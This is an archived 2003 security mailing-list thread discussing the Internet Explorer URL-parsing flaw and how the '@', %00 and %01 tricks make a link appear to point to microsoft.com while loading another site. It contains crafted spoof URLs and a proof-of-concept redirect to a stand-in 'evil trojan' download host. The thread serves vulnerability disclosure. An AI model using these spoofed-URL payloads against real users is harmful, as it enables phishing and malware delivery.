Full Disclosure mailing list archives
RE: RE: FWD: Internet Explorer URL parsing vulnerability
From: Rainer Gerhards <rgerhards () hq adiscon com>
Date: Wed, 10 Dec 2003 16:06:20 +0100
Just to add http://www.microsoft.com:security%00 () www linux org/ works equally well with Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2.1) Gecko/20030225 under Red Hat Linux 9. So it is not just an IE issue... Opera at least displays a decent warning and also replaces the password part of the credentials in visible display. Rainer On Wed, 2003-12-10 at 13:53, Rainer Gerhards wrote:
Well, 0x00 works even better (as usual). Consider the following URL: http://www.microsoft.com:security%00@%77w%77%2elinu%78%2eorg This, together with a little social engineering can do much. In my IE 6.0.2800.1106.xpsp2.03422-1633 this takes your to www.linux.org, which is also shown in the address bar. The status bar will show "www.microsoft.com:security" whenever you hover over relative links on the site (check with the news). The trick will most probably work will with fake sites that remove the address bar. The 0x00 C string terminator causes often quite some troubles. I remember reporting a similar problem to Microsoft some month ago, then related to %00 not being correctly parsed by IIS. It was considered low risk by Microsoft and not immediately addressed (I have to admit I actually think this at least not very high risk...). It should be addressed by now. Back to the dicsussed topic: I think it is also not very clever to display credentials in the status bar. So if somebody is dumb enough to actually use URLs with credentials, I think the browser should remove them in all visible elements. Rainer Gerhards Adiscon ________________________________ From: VeNoMouS [mailto:venom () gen-x co nz] Sent: Wednesday, December 10, 2003 6:03 AM To: Julian HO Thean Swee; full-disclosure () lists netsys com Subject: Re: [Full-disclosure] RE: FWD: Internet Explorer URL parsing vulnerability umm tested this you dont need %01 either btw. www.microsoft.com () www linux org was messing around with some hex stile as well is there a way to call a file:// inside a http:// becos the issue with doing the @ trick is it appends http:// automaticly, mind you , u could just make it exec some vb code or something on a site, just a random idea any way and it dont also seem to work if you use hex as well for the full domain ie www.microsoft.com%40%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67 nor www.microsoft.com%40www.linux.org where as if you www.microsoft.com@%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67 works ----- Original Message ----- From: Julian HO Thean Swee <mailto:jho () starhub com> To: 'full-disclosure () lists netsys com' Sent: Wednesday, December 10, 2003 4:22 PM Subject: [Full-disclosure] RE: FWD: Internet Explorer URL parsing vulnerability Hmm, it doesn't seem to work on my browser :) I don't even get transported to any page when i click the button. But then again, i have everything turned off in the internet zone by default... (but my submit non-encrypted form data is on) Does it really work then? it looks like it's using javascript...? (location.href) Merry Christmas everyone :) --__--__-- Message: 1 Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST) From: S G Masood <sgmasood () yahoo com> To: full-disclosure () lists netsys com Subject: [Full-disclosure] RE: FWD: Internet Explorer URL parsing vulnerability LOL. This is so simple and dangerous, it almost made me laugh and cry at the same time. Most of you will realise why...;D The Paypal, AOL, Visa, Mastercard, et al email scammers will have a harvest of gold this month with lots of zombies falling for this simple technique. ># POC ##########http://www.zapthedingbat.com/security/ex01/vun1.htmDont be surprised if your latest download from http://www.microsoft.com turns out to be a trojan! location.href=unescape('http://windowsupdate.microsoft.com%01@comedownlo adaneviltrojanfromme.com); -- S.G.Masood Hyderabad, India PS: One more thing - no scripting required to exploit this. __________________________________ Do you Yahoo!? Free Pop-Up Blocker - Get it now http://companion.yahoo.com/ This email is confidential and privileged. If you are not the intended recipient, you must not view, disseminate, use or copy this email. Kindly notify the sender immediately, and delete this email from your system. Thank you. Please visit our website at www.starhub.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Re: Internet Explorer URL parsing vulnerability, (continued)
- RE: Re: Internet Explorer URL parsing vulnerability Rui Pereira (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability Exibar (Dec 10)
- RE: Re: Internet Explorer URL parsing vulnerability Rui Pereira (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability Exibar (Dec 10)
- RE: Re: Internet Explorer URL parsing vulnerability Kristian Hermansen (Dec 11)
- RE: Re: Internet Explorer URL parsing vulnerability Karlis Zigurs (Dec 11)
- Re: Re: Internet Explorer URL parsing vulnerability Valdis . Kletnieks (Dec 11)
- RE: RE: FWD: Internet Explorer URL parsing vulnerability Rainer Gerhards (Dec 10)
- Re: RE: FWD: Internet Explorer URL parsing vulnerability Georgi Guninski (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability S G Masood (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability John Sage (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability Daniel H. Renner (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability petard (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability Jedi/Sector One (Dec 10)
- Re: Re: Internet Explorer URL parsing vulnerability Valdis . Kletnieks (Dec 10)